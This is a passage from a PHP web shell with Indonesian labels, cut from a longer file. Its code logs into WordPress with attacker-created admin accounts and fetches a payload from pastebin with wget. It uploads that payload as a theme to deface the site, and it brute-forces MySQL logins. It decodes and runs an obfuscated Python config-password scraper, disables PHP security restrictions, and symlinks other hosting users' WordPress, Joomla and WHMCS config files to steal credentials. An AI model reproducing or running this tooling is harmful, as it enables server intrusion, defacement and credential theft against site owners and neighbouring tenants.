3307curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
3308curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3309curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
3310curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
3311curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
3312curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
3313curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
3314$data = curl_exec ($ch1);
3315return $data;
3316 }
3317
3318 function lohgin($cek, $web, $userr, $pass){
3319 $post = array(
3320 "log" => "$userr",
3321 "pwd" => "$pass",
3322 "rememberme" => "forever",
3323 "wp-submit" => "Log In",
3324 "redirect_to" => "$web/wp-admin/",
3325 "testcookie" => "1",
3326 );
3327$ch = curl_init ("$cek");
3328curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3329curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3330curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3331curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
3332curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3333curl_setopt ($ch, CURLOPT_POST, 1);
3334curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
3335curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3336curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3337$data6 = curl_exec ($ch);
3338return $data6;
3339 }
3340
3341$site= "$target/wp-login.php";
3342$site2= "$target/wp-admin/theme-install.php?upload";
3343$a = lohgin($site, $target, $user_baru, $password_baru);
3344$b = lohgin($site2, $target, $user_baru, $password_baru);
3345
3346
3347$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3348echo "# token -> $anu2<br>";
3349
3350
3351 system('wget http://pastebin.com/raw.php?i=mEQP6prW');
3352 system('cp raw.php?i=mEQP6prW m.php');
3353
3354 $post2 = array(
3355 "_wpnonce" => "$anu2",
3356 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3357 "themezip" => "@m.php",
3358 "install-theme-submit" => "Install Now",
3359 );
3360$ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
3361curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3362curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3363curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3364curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
3365curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3366curl_setopt ($ch, CURLOPT_POST, 1);
3367curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
3368curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3369curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3370$data3 = curl_exec ($ch);
3371
3372$namafile = "wew.php";
3373$fp2 = fopen($namafile,"w");
3374fputs($fp2,$nick);
3375
3376$y = date("Y");
3377$m = date("m");
3378
3379
3380$ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
3381curl_setopt($ch6, CURLOPT_POST, true);
3382curl_setopt($ch6, CURLOPT_POSTFIELDS,
3383array('file3'=>"@$namafile"));
3384curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3385curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
3386$postResult = curl_exec($ch6);
3387curl_close($ch6);
3388
3389$as = "$target/k.php";
3390$bs = file_get_contents($as);
3391 if(preg_match("#hacked#si",$bs)){
3392 echo "# <font color='green'>berhasil mepes...</font><br>";
3393 echo "# $target/k.php<br>";
3394 }
3395 else{
3396 echo "# <font color='red'>gagal mepes...</font><br>";
3397 echo "# coba aja manual: <br>";
3398 echo "# $target/wp-login.php<br>";
3399 echo "# username: $user_baru<br>";
3400 echo "# password: $password_baru<br>";
3401
3402
3403 }
3404
3405
3406
3407
3408 }
3409
3410 elseif($tanya=="n"){
3411 echo "# Sukses<br>";
3412 echo "# username: $user_baru<br>";
3413 echo "# password: $password_baru<br>";
3414 }
3415
3416
3417
3418 }else{
3419 echo '<html>
3420 <head>
3421 <title>Wordpress Created New User</title>
3422 </head>
3423
3424 <body>
3425 <center>
3426 <center><div id="button"></div>
3427 <h2>Wordpress Created New User</h2>
3428 <table>
3429 <tr><td><form method="post" action="?action"></td></tr>
3430 <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
3431 <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
3432 <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
3433 <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
3434 <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
3435 <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
3436 <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
3437 <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
3438
3439 <tr><td><input type="text" name="nick" placeholder="Hacked By Tu5b0l3d"></td></tr>
3440 <tr><td><input type="submit" value="Ganti"></td></tr>
3441 </table>
3442 *nb: kalo milih y ... silahkan Ganti Form Hacked By Tu5b0l3d jadi Hacked by Nick_ente
3443 </center>
3444 </body>';
3445 }
3446
3447}
3448
3449elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
3450 {
3451 ?>
3452 <form action="?path=<?php echo $path; ?>&x=brute" method="post">
3453<?php
3454
3455@set_time_limit(0);
3456@error_reporting(0);
3457
3458
3459if($_POST['page']=='find')
3460{
3461if(isset($_POST['usernames']) && isset($_POST['passwords']))
3462{
3463 if($_POST['type'] == 'passwd'){
3464 $e = explode("\n",$_POST['usernames']);
3465 foreach($e as $value){
3466 $k = explode(":",$value);
3467 $username .= $k['0']." ";
3468 }
3469 }elseif($_POST['type'] == 'simple'){
3470 $username = str_replace("\n",' ',$_POST['usernames']);
3471 }
3472 $a1 = explode(" ",$username);
3473 $a2 = explode("\n",$_POST['passwords']);
3474 $id2 = count($a2);
3475 $ok = 0;
3476 foreach($a1 as $user )
3477 {
3478 if($user !== '')
3479 {
3480 $user=trim($user);
3481 for($i=0;$i<=$id2;$i++)
3482 {
3483 $pass = trim($a2[$i]);
3484 if(@mysql_connect('localhost',$user,$pass))
3485 {
3486 echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
3487 $ok++;
3488 }
3489 }
3490 }
3491 }
3492 echo "<hr><b>You Found <font color=red>$ok</font> Nice</b>";
3493 echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
3494 exit;
3495}
3496}
3497if($_POST['pass']=='password'){
3498@error_reporting(0);
3499$i = getenv('REMOTE_ADDR');
3500$d = date('D, M jS, Y H:i',time());
3501$h = $_SERVER['HTTP_HOST'];
3502$dir=$_SERVER['PHP_SELF'];
3503mkdir('config',0755);
3504$cp =
3505'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
3506$file = fopen("cp.py","w+");
3507$write = fwrite ($file ,base64_decode($cp));
3508fclose($file);
3509chmod("cp.py",0755);
3510$url = $_POST['url'];
3511echo"<center>
3512<textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
3513system("python cp.py $url config");
3514unlink ('cp.py');
3515echo"</textarea>
3516</center>";
3517echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
3518exit;
3519}
3520if($_POST['matikan']=='sekatan'){
3521@error_reporting(0);
3522$phpini =
3523'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
3524$file = fopen("php.ini","w+");
3525$write = fwrite ($file ,base64_decode($phpini));
3526fclose($file);
3527$htaccess =
3528'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
3529$file = fopen(".htaccess","w+");
3530$write = fwrite ($file ,base64_decode($htaccess));
3531echo "<hr><center><b>DONE!";
3532echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
3533exit;
3534}
3535if($_POST['mendapatkan']=='passwd'){
3536@set_magic_quotes_runtime(0);
3537ob_start();
3538error_reporting(0);
3539@set_time_limit(0);
3540@ini_set('max_execution_time',0);
3541@ini_set('output_buffering',0);
3542$fn = $_POST['foldername'];
3543//all function here
3544
3545function syml($usern,$pdomain)
3546 {
3547 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3548 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3549 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3550 symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3551 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3552 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3553 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3554 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3555 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3556 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3557 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3558 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3559 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3560 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3561 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3562 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3563 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3564 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3565 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3566 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3567 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3568 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3569 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3570 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3571 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3572 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3573 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3574 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3575 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3576 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3577 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3578 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3579 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3580 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3581 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3582 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3583 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3584 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3585 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3586 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3587 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3588 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3589 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3590 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3591 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3592 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3593 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3594 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3595 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3596 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3597 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3598 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3599 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3600 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3601 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3602 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3603 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3604 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3605 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3606 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3607 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3608 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3609 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3610 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3611 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3612 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3613 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3614 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
